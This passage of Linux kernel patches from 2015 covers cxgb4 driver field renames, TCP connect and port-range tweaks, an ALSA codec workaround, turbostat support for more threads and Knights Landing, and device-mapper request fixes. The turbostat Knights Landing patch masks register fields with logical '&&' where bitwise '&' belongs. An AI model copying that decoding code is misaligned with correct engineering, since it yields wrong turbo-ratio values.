0, sizeof(c)); c.op_to_vfn = htonl(FW_CMD_OP_V(FW_EQ_OFLD_CMD) | FW_CMD_REQUEST_F | FW_CMD_WRITE_F | FW_CMD_EXEC_F | - FW_EQ_OFLD_CMD_PFN_V(adap->fn) | + FW_EQ_OFLD_CMD_PFN_V(adap->pf) | FW_EQ_OFLD_CMD_VFN_V(0)); c.alloc_to_len16 = htonl(FW_EQ_OFLD_CMD_ALLOC_F | FW_EQ_OFLD_CMD_EQSTART_F | FW_LEN16(c)); @@ -2731,7 +2731,7 @@ int t4_sge_alloc_ofld_txq(struct adapter *adap, struct sge_ofld_txq *txq, FW_EQ_OFLD_CMD_EQSIZE_V(nentries)); c.eqaddr = cpu_to_be64(txq->q.phys_addr); - ret = t4_wr_mbox(adap, adap->fn, &c, sizeof(c), &c); + ret = t4_wr_mbox(adap, adap->mbox, &c, sizeof(c), &c); if (ret) { kfree(txq->q.sdesc); txq->q.sdesc = NULL; @@ -2770,7 +2770,7 @@ static void free_rspq_fl(struct adapter *adap, struct sge_rspq *rq, unsigned int fl_id = fl ? fl->cntxt_id : 0xffff; adap->sge.ingr_map[rq->cntxt_id - adap->sge.ingr_start] = NULL; - t4_iq_free(adap, adap->fn, adap->fn, 0, FW_IQ_TYPE_FL_INT_CAP, + t4_iq_free(adap, adap->mbox, adap->pf, 0, FW_IQ_TYPE_FL_INT_CAP, rq->cntxt_id, fl_id, 0xffff); dma_free_coherent(adap->pdev_dev, (rq->size + 1) * rq->iqe_len, rq->desc, rq->phys_addr); @@ -2825,7 +2825,7 @@ void t4_free_sge_resources(struct adapter *adap) free_rspq_fl(adap, &eq->rspq, eq->fl.size ? &eq->fl : NULL); if (etq->q.desc) { - t4_eth_eq_free(adap, adap->fn, adap->fn, 0, + t4_eth_eq_free(adap, adap->mbox, adap->pf, 0, etq->q.cntxt_id); free_tx_desc(adap, &etq->q, etq->q.in_use, true); kfree(etq->q.sdesc); @@ -2844,7 +2844,7 @@ void t4_free_sge_resources(struct adapter *adap) if (q->q.desc) { tasklet_kill(&q->qresume_tsk); - t4_ofld_eq_free(adap, adap->fn, adap->fn, 0, + t4_ofld_eq_free(adap, adap->mbox, adap->pf, 0, q->q.cntxt_id); free_tx_desc(adap, &q->q, q->q.in_use, false); kfree(q->q.sdesc); @@ -2859,7 +2859,7 @@ void t4_free_sge_resources(struct adapter *adap) if (cq->q.desc) { tasklet_kill(&cq->qresume_tsk); - t4_ctrl_eq_free(adap, adap->fn, adap->fn, 0, + t4_ctrl_eq_free(adap, adap->mbox, adap->pf, 0, cq->q.cntxt_id); __skb_queue_purge(&cq->sendq); free_txq(adap, &cq->q); diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index 7b92f0f86205..36a858c24305 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -150,7 +150,7 @@ void t4_write_indirect(struct adapter *adap, unsigned int addr_reg, */ void t4_hw_pci_read_cfg4(struct adapter *adap, int reg, u32 *val) { - u32 req = ENABLE_F | FUNCTION_V(adap->fn) | REGISTER_V(reg); + u32 req = ENABLE_F | FUNCTION_V(adap->pf) | REGISTER_V(reg); if (is_t4(adap->params.chip)) req |= LOCALCFG_F; @@ -412,7 +412,7 @@ int t4_memory_rw(struct adapter *adap, int win, int mtype, u32 addr, mem_base = PCIEOFST_G(mem_reg) << PCIEOFST_SHIFT_X; if (is_t4(adap->params.chip)) mem_base -= adap->t4_bar0; - win_pf = is_t4(adap->params.chip) ? 0 : PFNUM_V(adap->fn); + win_pf = is_t4(adap->params.chip) ? 0 : PFNUM_V(adap->pf); /* Calculate our initial PCI-E Memory Window Position and Offset into * that Window. @@ -547,7 +547,7 @@ u32 t4_read_pcie_cfg4(struct adapter *adap, int reg) ldst_cmd.cycles_to_len16 = cpu_to_be32(FW_LEN16(ldst_cmd)); ldst_cmd.u.pcie.select_naccess = FW_LDST_CMD_NACCESS_V(1); ldst_cmd.u.pcie.ctrl_to_fn = - (FW_LDST_CMD_LC_F | FW_LDST_CMD_FN_V(adap->fn)); + (FW_LDST_CMD_LC_F | FW_LDST_CMD_FN_V(adap->pf)); ldst_cmd.u.pcie.r = reg; /* If the LDST Command succeeds, return the result, otherwise @@ -2062,7 +2062,7 @@ int t4_phy_fw_ver(struct adapter *adap, int *phy_fw_ver) FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_PHYFW) | FW_PARAMS_PARAM_Y_V(adap->params.portvec) | FW_PARAMS_PARAM_Z_V(FW_PARAMS_PARAM_DEV_PHYFW_VERSION)); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 1, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 1, ¶m, &val); if (ret < 0) return ret; @@ -2134,7 +2134,7 @@ int t4_load_phy_fw(struct adapter *adap, FW_PARAMS_PARAM_Y_V(adap->params.portvec) | FW_PARAMS_PARAM_Z_V(FW_PARAMS_PARAM_DEV_PHYFW_DOWNLOAD)); val = phy_fw_size; - ret = t4_query_params_rw(adap, adap->mbox, adap->fn, 0, 1, + ret = t4_query_params_rw(adap, adap->mbox, adap->pf, 0, 1, ¶m, &val, 1); if (ret < 0) return ret; @@ -2163,7 +2163,7 @@ int t4_load_phy_fw(struct adapter *adap, FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_PHYFW) | FW_PARAMS_PARAM_Y_V(adap->params.portvec) | FW_PARAMS_PARAM_Z_V(FW_PARAMS_PARAM_DEV_PHYFW_DOWNLOAD)); - ret = t4_set_params_timeout(adap, adap->mbox, adap->fn, 0, 1, + ret = t4_set_params_timeout(adap, adap->mbox, adap->pf, 0, 1, ¶m, &val, 30000); /* If we have version number support, then check to see that the new @@ -2199,7 +2199,7 @@ int t4_fwcache(struct adapter *adap, enum fw_params_param_dev_fwcache op) c.op_to_vfn = cpu_to_be32(FW_CMD_OP_V(FW_PARAMS_CMD) | FW_CMD_REQUEST_F | FW_CMD_WRITE_F | - FW_PARAMS_CMD_PFN_V(adap->fn) | + FW_PARAMS_CMD_PFN_V(adap->pf) | FW_PARAMS_CMD_VFN_V(0)); c.retval_len16 = cpu_to_be32(FW_LEN16(c)); c.param[0].mnem = @@ -5299,7 +5299,7 @@ int t4_prep_adapter(struct adapter *adapter) } /** - * cxgb4_t4_bar2_sge_qregs - return BAR2 SGE Queue register information + * t4_bar2_sge_qregs - return BAR2 SGE Queue register information * @adapter: the adapter * @qid: the Queue ID * @qtype: the Ingress or Egress type for @qid @@ -5323,7 +5323,7 @@ int t4_prep_adapter(struct adapter *adapter) * Write Combining Doorbell Buffer. If the BAR2 Queue ID is not 0, * then these "Inferred Queue ID" register may not be used. */ -int cxgb4_t4_bar2_sge_qregs(struct adapter *adapter, +int t4_bar2_sge_qregs(struct adapter *adapter, unsigned int qid, enum t4_bar2_qtype qtype, u64 *pbar2_qoffset, @@ -5457,13 +5457,13 @@ int t4_init_sge_params(struct adapter *adapter) */ hps = t4_read_reg(adapter, SGE_HOST_PAGE_SIZE_A); s_hps = (HOSTPAGESIZEPF0_S + - (HOSTPAGESIZEPF1_S - HOSTPAGESIZEPF0_S) * adapter->fn); + (HOSTPAGESIZEPF1_S - HOSTPAGESIZEPF0_S) * adapter->pf); sge_params->hps = ((hps >> s_hps) & HOSTPAGESIZEPF0_M); /* Extract the SGE Egress and Ingess Queues Per Page for our PF. */ s_qpp = (QUEUESPERPAGEPF0_S + - (QUEUESPERPAGEPF1_S - QUEUESPERPAGEPF0_S) * adapter->fn); + (QUEUESPERPAGEPF1_S - QUEUESPERPAGEPF0_S) * adapter->pf); qpp = t4_read_reg(adapter, SGE_EGRESS_QUEUES_PER_PAGE_PF_A); sge_params->eq_qpp = ((qpp >> s_qpp) & QUEUESPERPAGEPF0_M); qpp = t4_read_reg(adapter, SGE_INGRESS_QUEUES_PER_PAGE_PF_A); diff --git a/drivers/net/ethernet/chelsio/cxgb4vf/sge.c b/drivers/net/ethernet/chelsio/cxgb4vf/sge.c index 2e41d1541d73..be4ab09d11d7 100644 --- a/drivers/net/ethernet/chelsio/cxgb4vf/sge.c +++ b/drivers/net/ethernet/chelsio/cxgb4vf/sge.c @@ -2162,8 +2162,8 @@ static void __iomem *bar2_address(struct adapter *adapter, u64 bar2_qoffset; int ret; - ret = t4_bar2_sge_qregs(adapter, qid, qtype, - &bar2_qoffset, pbar2_qid); + ret = t4vf_bar2_sge_qregs(adapter, qid, qtype, + &bar2_qoffset, pbar2_qid); if (ret) return NULL; diff --git a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h index b9debb4f29a3..75df25970d5e 100644 --- a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h +++ b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_common.h @@ -284,11 +284,11 @@ int t4vf_fw_reset(struct adapter *); int t4vf_set_params(struct adapter *, unsigned int, const u32 *, const u32 *); enum t4_bar2_qtype { T4_BAR2_QTYPE_EGRESS, T4_BAR2_QTYPE_INGRESS }; -int t4_bar2_sge_qregs(struct adapter *adapter, - unsigned int qid, - enum t4_bar2_qtype qtype, - u64 *pbar2_qoffset, - unsigned int *pbar2_qid); +int t4vf_bar2_sge_qregs(struct adapter *adapter, + unsigned int qid, + enum t4_bar2_qtype qtype, + u64 *pbar2_qoffset, + unsigned int *pbar2_qid); int t4vf_get_sge_params(struct adapter *); int t4vf_get_vpd_params(struct adapter *); diff --git a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c index 966ee900ed00..135909ecbc0f 100644 --- a/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4vf/t4vf_hw.c @@ -428,7 +428,7 @@ int t4vf_set_params(struct adapter *adapter, unsigned int nparams, } /** - * t4_bar2_sge_qregs - return BAR2 SGE Queue register information + * t4vf_bar2_sge_qregs - return BAR2 SGE Queue register information * @adapter: the adapter * @qid: the Queue ID * @qtype: the Ingress or Egress type for @qid @@ -452,11 +452,11 @@ int t4vf_set_params(struct adapter *adapter, unsigned int nparams, * Write Combining Doorbell Buffer. If the BAR2 Queue ID is not 0, * then these "Inferred Queue ID" register may not be used. */ -int t4_bar2_sge_qregs(struct adapter *adapter, - unsigned int qid, - enum t4_bar2_qtype qtype, - u64 *pbar2_qoffset, - unsigned int *pbar2_qid) +int t4vf_bar2_sge_qregs(struct adapter *adapter, + unsigned int qid, + enum t4_bar2_qtype qtype, + u64 *pbar2_qoffset, + unsigned int *pbar2_qid) { unsigned int page_shift, page_size, qpp_shift, qpp_mask; u64 bar2_page_offset, bar2_qoffset; From e2baad9e4b153c67dddc5ccf987395b842329c84 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Wed, 27 May 2015 10:46:02 -0700 Subject: [PATCH 322/872] tcp: connect() from bound sockets can be faster __inet_hash_connect() does not use its third argument (port_offset) if socket was already bound to a source port. No need to perform useless but expensive md5 computations. Reported-by: Crestez Dan Leonard Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller --- net/ipv4/inet_hashtables.c | 9 +++++++-- net/ipv6/inet6_hashtables.c | 8 ++++++-- 2 files changed, 13 insertions(+), 4 deletions(-) diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c index 1b336dc179f8..5f9b063bbe8a 100644 --- a/net/ipv4/inet_hashtables.c +++ b/net/ipv4/inet_hashtables.c @@ -394,9 +394,10 @@ static int __inet_check_established(struct inet_timewait_death_row *death_row, return -EADDRNOTAVAIL; } -static inline u32 inet_sk_port_offset(const struct sock *sk) +static u32 inet_sk_port_offset(const struct sock *sk) { const struct inet_sock *inet = inet_sk(sk); + return secure_ipv4_port_ephemeral(inet->inet_rcv_saddr, inet->inet_daddr, inet->inet_dport); @@ -600,7 +601,11 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row, int inet_hash_connect(struct inet_timewait_death_row *death_row, struct sock *sk) { - return __inet_hash_connect(death_row, sk, inet_sk_port_offset(sk), + u32 port_offset = 0; + + if (!inet_sk(sk)->inet_num) + port_offset = inet_sk_port_offset(sk); + return __inet_hash_connect(death_row, sk, port_offset, __inet_check_established); } EXPORT_SYMBOL_GPL(inet_hash_connect); diff --git a/net/ipv6/inet6_hashtables.c b/net/ipv6/inet6_hashtables.c index 871641bc1ed4..b4fd96de97e6 100644 --- a/net/ipv6/inet6_hashtables.c +++ b/net/ipv6/inet6_hashtables.c @@ -257,7 +257,7 @@ static int __inet6_check_established(struct inet_timewait_death_row *death_row, return -EADDRNOTAVAIL; } -static inline u32 inet6_sk_port_offset(const struct sock *sk) +static u32 inet6_sk_port_offset(const struct sock *sk) { const struct inet_sock *inet = inet_sk(sk); @@ -269,7 +269,11 @@ static inline u32 inet6_sk_port_offset(const struct sock *sk) int inet6_hash_connect(struct inet_timewait_death_row *death_row, struct sock *sk) { - return __inet_hash_connect(death_row, sk, inet6_sk_port_offset(sk), + u32 port_offset = 0; + + if (!inet_sk(sk)->inet_num) + port_offset = inet6_sk_port_offset(sk); + return __inet_hash_connect(death_row, sk, port_offset, __inet6_check_established); } EXPORT_SYMBOL_GPL(inet6_hash_connect); From ed2dfd900992aa7b6b3d0abd8ec9a7e9d2c7f827 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Wed, 27 May 2015 11:34:37 -0700 Subject: [PATCH 323/872] tcp/dccp: warn user for preferred ip_local_port_range After commit 07f4c90062f8f ("tcp/dccp: try to not exhaust ip_local_port_range in connect()") it is advised to have an even number of ports described in /proc/sys/net/ipv4/ip_local_port_range This means start/end values should have a different parity. Let's warn sysadmins of this, so that they can update their settings if they want to. Suggested-by: David S. Miller Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller --- include/net/netns/ipv4.h | 1 + net/ipv4/sysctl_net_ipv4.c | 6 ++++++ 2 files changed, 7 insertions(+) diff --git a/include/net/netns/ipv4.h b/include/net/netns/ipv4.h index 6848b8bb2e63..c68926b4899c 100644 --- a/include/net/netns/ipv4.h +++ b/include/net/netns/ipv4.h @@ -19,6 +19,7 @@ struct sock; struct local_ports { seqlock_t lock; int range[2]; + bool warned; }; struct ping_group_range { diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c index e64892769607..0330ab2e2b63 100644 --- a/net/ipv4/sysctl_net_ipv4.c +++ b/net/ipv4/sysctl_net_ipv4.c @@ -45,7 +45,13 @@ static int ip_ping_group_range_max[] = { GID_T_MAX, GID_T_MAX }; /* Update system visible IP port range */ static void set_local_port_range(struct net *net, int range[2]) { + bool same_parity = !((range[0] ^ range[1]) & 1); + write_seqlock(&net->ipv4.ip_local_ports.lock); + if (same_parity && !net->ipv4.ip_local_ports.warned) { + net->ipv4.ip_local_ports.warned = true; + pr_err_ratelimited("ip_local_port_range: prefer different parity for start/end values.\n"); + } net->ipv4.ip_local_ports.range[0] = range[0]; net->ipv4.ip_local_ports.range[1] = range[1]; write_sequnlock(&net->ipv4.ip_local_ports.lock); From c545f799c7470682756ca64c63f6bfcdaf28442b Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Wed, 27 May 2015 21:20:12 +0200 Subject: [PATCH 324/872] ALSA: hda - Disable power_save_node for IDT92HD71bxx We've got a regression report that 4.1-rc causes noises on a Dell laptop. Similar like Realtek codec, this seems also triggered by the recent power_save_node feature. As this kind of issue is quite hard to debug without actual hardware, disable the power_save_node flag for this codec as a workaround. Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=98971 Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_sigmatel.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/sound/pci/hda/patch_sigmatel.c b/sound/pci/hda/patch_sigmatel.c index 0de0fd95144a..6833c74ed6ff 100644 --- a/sound/pci/hda/patch_sigmatel.c +++ b/sound/pci/hda/patch_sigmatel.c @@ -4696,7 +4696,8 @@ static int patch_stac92hd71bxx(struct hda_codec *codec) return err; spec = codec->spec; - codec->power_save_node = 1; + /* disabled power_save_node since it causes noises on a Dell machine */ + /* codec->power_save_node = 1; */ spec->linear_tone_beep = 0; spec->gen.own_eapd_ctl = 1; spec->gen.power_down_unused = 1; From e275b3885dffd31095984ed2476ed0447fa7309a Mon Sep 17 00:00:00 2001 From: Dasaratharaman Chandramouli Date: Wed, 15 Apr 2015 10:09:50 -0700 Subject: [PATCH 325/872] tools/power turbostat: correctly display more than 2 threads/core Without this update, turbostat displays only 2 threads per core. Some processors, such as Xeon Phi, have more. Signed-off-by: Dasaratharaman Chandramouli Signed-off-by: Len Brown --- tools/power/x86/turbostat/turbostat.c | 71 +++++++++++++++++++-------- 1 file changed, 51 insertions(+), 20 deletions(-) diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c index bac98ca3d4ca..d85adbafbe60 100644 --- a/tools/power/x86/turbostat/turbostat.c +++ b/tools/power/x86/turbostat/turbostat.c @@ -1381,12 +1381,41 @@ int parse_int_file(const char *fmt, ...) } /* - * cpu_is_first_sibling_in_core(cpu) - * return 1 if given CPU is 1st HT sibling in the core + * get_cpu_position_in_core(cpu) + * return the position of the CPU among its HT siblings in the core + * return -1 if the sibling is not in list */ -int cpu_is_first_sibling_in_core(int cpu) +int get_cpu_position_in_core(int cpu) { - return cpu == parse_int_file("/sys/devices/system/cpu/cpu%d/topology/thread_siblings_list", cpu); + char path[64]; + FILE *filep; + int this_cpu; + char character; + int i; + + sprintf(path, + "/sys/devices/system/cpu/cpu%d/topology/thread_siblings_list", + cpu); + filep = fopen(path, "r"); + if (filep == NULL) { + perror(path); + exit(1); + } + + for (i = 0; i < topo.num_threads_per_core; i++) { + fscanf(filep, "%d", &this_cpu); + if (this_cpu == cpu) { + fclose(filep); + return i; + } + + /* Account for no separator after last thread*/ + if (i != (topo.num_threads_per_core - 1)) + fscanf(filep, "%c", &character); + } + + fclose(filep); + return -1; } /* @@ -1412,25 +1441,31 @@ int get_num_ht_siblings(int cpu) { char path[80]; FILE *filep; - int sib1, sib2; - int matches; + int sib1; + int matches = 0; char character; + char str[100]; + char *ch; sprintf(path, "/sys/devices/system/cpu/cpu%d/topology/thread_siblings_list", cpu); filep = fopen_or_die(path, "r"); + /* * file format: - * if a pair of number with a character between: 2 siblings (eg. 1-2, or 1,4) - * otherwinse 1 sibling (self). + * A ',' separated or '-' separated set of numbers + * (eg 1-2 or 1,3,4,5) */ - matches = fscanf(filep, "%d%c%d\n", &sib1, &character, &sib2); + fscanf(filep, "%d%c\n", &sib1, &character); + fseek(filep, 0, SEEK_SET); + fgets(str, 100, filep); + ch = strchr(str, character); + while (ch != NULL) { + matches++; + ch = strchr(ch+1, character); + } fclose(filep); - - if (matches == 3) - return 2; - else - return 1; + return matches+1; } /* @@ -2755,13 +2790,9 @@ int initialize_counters(int cpu_id) my_package_id = get_physical_package_id(cpu_id); my_core_id = get_core_id(cpu_id); - - if (cpu_is_first_sibling_in_core(cpu_id)) { - my_thread_id = 0; + my_thread_id = get_cpu_position_in_core(cpu_id); + if (!my_thread_id) topo.num_cores++; - } else { - my_thread_id = 1; - } init_counter(EVEN_COUNTERS, my_thread_id, my_core_id, my_package_id, cpu_id); init_counter(ODD_COUNTERS, my_thread_id, my_core_id, my_package_id, cpu_id); From 4c6dd53dd3674c310d7379c6b3273daa9fd95c79 Mon Sep 17 00:00:00 2001 From: Mike Snitzer Date: Wed, 27 May 2015 15:23:56 -0400 Subject: [PATCH 326/872] dm mpath: fix leak of dm_mpath_io structure in blk-mq .queue_rq error path Otherwise kmemleak reported: unreferenced object 0xffff88009b14e2b0 (size 16): comm "fio", pid 4274, jiffies 4294978034 (age 1253.210s) hex dump (first 16 bytes): 40 12 f3 99 01 88 ff ff 00 10 00 00 00 00 00 00 @............... backtrace: [] kmemleak_alloc+0x49/0xb0 [] kmem_cache_alloc+0xf8/0x160 [] mempool_alloc_slab+0x10/0x20 [] mempool_alloc+0x57/0x150 [] __multipath_map.isra.17+0xe1/0x220 [dm_multipath] [] multipath_clone_and_map+0x15/0x20 [dm_multipath] [] map_request.isra.39+0xd5/0x220 [dm_mod] [] dm_mq_queue_rq+0x134/0x240 [dm_mod] [] __blk_mq_run_hw_queue+0x1d5/0x380 [] blk_mq_run_hw_queue+0xc5/0x100 [] blk_sq_make_request+0x240/0x300 [] generic_make_request+0xc0/0x110 [] submit_bio+0x72/0x150 [] do_blockdev_direct_IO+0x1f3b/0x2da0 [] __blockdev_direct_IO+0x3e/0x40 [] ext4_direct_IO+0x1aa/0x390 Fixes: e5863d9ad ("dm: allocate requests in target when stacking on blk-mq devices") Reported-by: Bart Van Assche Signed-off-by: Mike Snitzer Cc: stable@vger.kernel.org # 4.0+ --- drivers/md/dm-mpath.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/md/dm-mpath.c b/drivers/md/dm-mpath.c index 63953477a07c..eff7bdd7731d 100644 --- a/drivers/md/dm-mpath.c +++ b/drivers/md/dm-mpath.c @@ -429,9 +429,11 @@ static int __multipath_map(struct dm_target *ti, struct request *clone, /* blk-mq request-based interface */ *__clone = blk_get_request(bdev_get_queue(bdev), rq_data_dir(rq), GFP_ATOMIC); - if (IS_ERR(*__clone)) + if (IS_ERR(*__clone)) { /* ENOMEM, requeue */ + clear_mapinfo(m, map_context); return r; + } (*__clone)->bio = (*__clone)->biotail = NULL; (*__clone)->rq_disk = bdev->bd_disk; (*__clone)->cmd_flags |= REQ_FAILFAST_TRANSPORT; From 45714fbed4556149d7f1730f5bae74f81d5e2cd5 Mon Sep 17 00:00:00 2001 From: Mike Snitzer Date: Wed, 27 May 2015 15:25:27 -0400 Subject: [PATCH 327/872] dm: requeue from blk-mq dm_mq_queue_rq() using BLK_MQ_RQ_QUEUE_BUSY Use BLK_MQ_RQ_QUEUE_BUSY to requeue a blk-mq request directly from the DM blk-mq device's .queue_rq. This cleans up the previous convoluted handling of request requeueing that would return BLK_MQ_RQ_QUEUE_OK (even though it wasn't) and then run blk_mq_requeue_request() followed by blk_mq_kick_requeue_list(). Also, document that DM blk-mq ontop of old request_fn devices cannot fail in clone_rq() since the clone request is preallocated as part of the pdu. Reported-by: Christoph Hellwig Signed-off-by: Mike Snitzer --- drivers/md/dm.c | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/drivers/md/dm.c b/drivers/md/dm.c index 1c62ed8d09f4..1badfb250a18 100644 --- a/drivers/md/dm.c +++ b/drivers/md/dm.c @@ -2754,13 +2754,15 @@ static int dm_mq_queue_rq(struct blk_mq_hw_ctx *hctx, if (dm_table_get_type(map) == DM_TYPE_REQUEST_BASED) { /* clone request is allocated at the end of the pdu */ tio->clone = (void *)blk_mq_rq_to_pdu(rq) + sizeof(struct dm_rq_target_io); - if (!clone_rq(rq, md, tio, GFP_ATOMIC)) - return BLK_MQ_RQ_QUEUE_BUSY; + (void) clone_rq(rq, md, tio, GFP_ATOMIC); queue_kthread_work(&md->kworker, &tio->work); } else { /* Direct call is fine since .queue_rq allows allocations */ - if (map_request(tio, rq, md) == DM_MAPIO_REQUEUE) - dm_requeue_unmapped_original_request(md, rq); + if (map_request(tio, rq, md) == DM_MAPIO_REQUEUE) { + /* Undo dm_start_request() before requeuing */ + rq_completed(md, rq_data_dir(rq), false); + return BLK_MQ_RQ_QUEUE_BUSY; + } } return BLK_MQ_RQ_QUEUE_OK; From fb5d432722e186c656285ccc088e35dbe24f6fd1 Mon Sep 17 00:00:00 2001 From: Dasaratharaman Chandramouli Date: Wed, 20 May 2015 09:49:34 -0700 Subject: [PATCH 328/872] tools/power turbostat: enable turbostat to support Knights Landing (KNL) Changes mainly to account for minor differences in Knights Landing(KNL): 1. KNL supports C1 and C6 core states. 2. KNL supports PC2, PC3 and PC6 package states. 3. KNL has a different encoding of the TURBO_RATIO_LIMIT MSR Signed-off-by: Dasaratharaman Chandramouli Signed-off-by: Len Brown --- arch/x86/include/uapi/asm/msr-index.h | 1 + tools/power/x86/turbostat/turbostat.c | 105 +++++++++++++++++++++++++- 2 files changed, 102 insertions(+), 4 deletions(-) diff --git a/arch/x86/include/uapi/asm/msr-index.h b/arch/x86/include/uapi/asm/msr-index.h index c469490db4a8..3c6bb342a48f 100644 --- a/arch/x86/include/uapi/asm/msr-index.h +++ b/arch/x86/include/uapi/asm/msr-index.h @@ -140,6 +140,7 @@ #define MSR_CORE_C3_RESIDENCY 0x000003fc #define MSR_CORE_C6_RESIDENCY 0x000003fd #define MSR_CORE_C7_RESIDENCY 0x000003fe +#define MSR_KNL_CORE_C6_RESIDENCY 0x000003ff #define MSR_PKG_C2_RESIDENCY 0x0000060d #define MSR_PKG_C8_RESIDENCY 0x00000630 #define MSR_PKG_C9_RESIDENCY 0x00000631 diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c index d85adbafbe60..256a5e1de381 100644 --- a/tools/power/x86/turbostat/turbostat.c +++ b/tools/power/x86/turbostat/turbostat.c @@ -52,6 +52,7 @@ unsigned int skip_c0; unsigned int skip_c1; unsigned int do_nhm_cstates; unsigned int do_snb_cstates; +unsigned int do_knl_cstates; unsigned int do_pc2; unsigned int do_pc3; unsigned int do_pc6; @@ -316,7 +317,7 @@ void print_header(void) if (do_nhm_cstates) outp += sprintf(outp, " CPU%%c1"); - if (do_nhm_cstates && !do_slm_cstates) + if (do_nhm_cstates && !do_slm_cstates && !do_knl_cstates) outp += sprintf(outp, " CPU%%c3"); if (do_nhm_cstates) outp += sprintf(outp, " CPU%%c6"); @@ -546,7 +547,7 @@ int format_counters(struct thread_data *t, struct core_data *c, if (!(t->flags & CPU_IS_FIRST_THREAD_IN_CORE)) goto done; - if (do_nhm_cstates && !do_slm_cstates) + if (do_nhm_cstates && !do_slm_cstates && !do_knl_cstates) outp += sprintf(outp, "%8.2f", 100.0 * c->c3/t->tsc); if (do_nhm_cstates) outp += sprintf(outp, "%8.2f", 100.0 * c->c6/t->tsc); @@ -1018,14 +1019,17 @@ int get_counters(struct thread_data *t, struct core_data *c, struct pkg_data *p) if (!(t->flags & CPU_IS_FIRST_THREAD_IN_CORE)) return 0; - if (do_nhm_cstates && !do_slm_cstates) { + if (do_nhm_cstates && !do_slm_cstates && !do_knl_cstates) { if (get_msr(cpu, MSR_CORE_C3_RESIDENCY, &c->c3)) return -6; } - if (do_nhm_cstates) { + if (do_nhm_cstates && !do_knl_cstates) { if (get_msr(cpu, MSR_CORE_C6_RESIDENCY, &c->c6)) return -7; + } else if (do_knl_cstates) { + if (get_msr(cpu, MSR_KNL_CORE_C6_RESIDENCY, &c->c6)) + return -7; } if (do_snb_cstates) @@ -1295,6 +1299,67 @@ dump_nhm_turbo_ratio_limits(void) return; } +static void +dump_knl_turbo_ratio_limits(void) +{ + int cores; + unsigned int ratio; + unsigned long long msr; + int delta_cores; + int delta_ratio; + int i; + + get_msr(0, MSR_NHM_TURBO_RATIO_LIMIT, &msr); + + fprintf(stderr, "cpu0: MSR_NHM_TURBO_RATIO_LIMIT: 0x%08llx\n", + msr); + + /** + * Turbo encoding in KNL is as follows: + * [7:0] -- Base value of number of active cores of bucket 1. + * [15:8] -- Base value of freq ratio of bucket 1. + * [20:16] -- +ve delta of number of active cores of bucket 2. + * i.e. active cores of bucket 2 = + * active cores of bucket 1 + delta + * [23:21] -- Negative delta of freq ratio of bucket 2. + * i.e. freq ratio of bucket 2 = + * freq ratio of bucket 1 - delta + * [28:24]-- +ve delta of number of active cores of bucket 3. + * [31:29]-- -ve delta of freq ratio of bucket 3. + * [36:32]-- +ve delta of number of active cores of bucket 4. + * [39:37]-- -ve delta of freq ratio of bucket 4. + * [44:40]-- +ve delta of number of active cores of bucket 5. + * [47:45]-- -ve delta of freq ratio of bucket 5. + * [52:48]-- +ve delta of number of active cores of bucket 6. + * [55:53]-- -ve delta of freq ratio of bucket 6. + * [60:56]-- +ve delta of number of active cores of bucket 7. + * [63:61]-- -ve delta of freq ratio of bucket 7. + */ + cores = msr & 0xFF; + ratio = (msr >> 8) && 0xFF; + if (ratio > 0) + fprintf(stderr, + "%d * %.0f = %.0f MHz max turbo %d active cores\n", + ratio, bclk, ratio * bclk, cores); + + for (i = 16; i < 64; i = i + 8) { + delta_cores = (msr >> i) & 0x1F; + delta_ratio = (msr >> (i + 5)) && 0x7; + if (!delta_cores || !delta_ratio) + return; + cores = cores + delta_cores; + ratio = ratio - delta_ratio; + + /** -ve ratios will make successive ratio calculations + * negative. Hence return instead of carrying on. + */ + if (ratio > 0) + fprintf(stderr, + "%d * %.0f = %.0f MHz max turbo %d active cores\n", + ratio, bclk, ratio * bclk, cores); + } +} + static void dump_nhm_cst_cfg(void) { @@ -1788,6 +1853,21 @@ int has_hsw_turbo_ratio_limit(unsigned int family, unsigned int model) } } +int has_knl_turbo_ratio_limit(unsigned int family, unsigned int model) +{ + if (!genuine_intel) + return 0; + + if (family != 6) + return 0; + + switch (model) { + case 0x57: /* Knights Landing */ + return 1; + default: + return 0; + } +} static void dump_cstate_pstate_config_info(family, model) { @@ -1805,6 +1885,9 @@ dump_cstate_pstate_config_info(family, model) if (has_nhm_turbo_ratio_limit(family, model)) dump_nhm_turbo_ratio_limits(); + if (has_knl_turbo_ratio_limit(family, model)) + dump_knl_turbo_ratio_limits(); + dump_nhm_cst_cfg(); } @@ -1985,6 +2068,7 @@ rapl_dram_energy_units_probe(int model, double rapl_energy_units) case 0x3F: /* HSX */ case 0x4F: /* BDX */ case 0x56: /* BDX-DE */ + case 